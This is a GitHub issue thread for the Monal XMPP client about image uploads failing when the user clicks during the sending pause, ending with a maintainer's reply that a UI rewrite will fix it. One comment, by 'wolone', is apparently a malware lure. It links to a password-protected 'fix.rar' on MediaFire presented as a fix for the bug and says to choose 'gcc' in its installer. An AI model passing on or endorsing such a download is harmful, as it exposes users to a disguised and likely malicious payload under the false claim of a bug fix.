### ISSUE TITLE
[Bug]: Image Upload Fails If User Clicks During Sending Pause

### ISSUE THREAD

**Issue by ghost** [monal-im/Monal#1217]
### What Monal Release channel are you using?

Beta

### iOS system version (if applicable)

17.5.1

### Monal version

6.4.4 Beta (977)

### Used XMPP server (domain)

balbalbla.org

### Which XMPP-Server software are you using?

ejabberd

### XMPP Server Software Version

24.7.15

### How many accounts are you using in Monal?

1

### What happened?

When uploading images, if a user selects an image and clicks "Send," there is a noticeable pause before the image appears to be sent. If the user clicks anywhere on the window during this pause, the image transfer fails. This issue can be problematic because users might think the "Send" button didn't work due to the delay and may click it again, causing the transfer to cancel or break down.

### FAQ

- [X] I have [checked the FAQ](https://github.com/monal-im/Monal/wiki/FAQ---Frequently-Asked-Questions) for my issue

### Considerations for XMPP users

- [X] I have checked if my issue can be solved with [Considerations for XMPP users](https://github.com/monal-im/Monal/wiki/Considerations-for-XMPP-users) and [Considerations for XMPP server admins](https://github.com/monal-im/Monal/wiki/Considerations-for-XMPP-server-admins)

### XEP-Check

- [X] I have checked that at least XEP-198, XEP-0280, XEP-0352, XEP-0357, XEP-0313 and XEP-0163 are activated on my server and shown as 'green' under Settings --> Account--> (i) in advanced settings

### Notifications-Menu

- [X] I have checked that all checkmarks are present under Settings --> Notifications

**Comment by wolone** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by tmolitor-stud-tu** [comment]
Will be solved with the chatui rewrite coming soon.
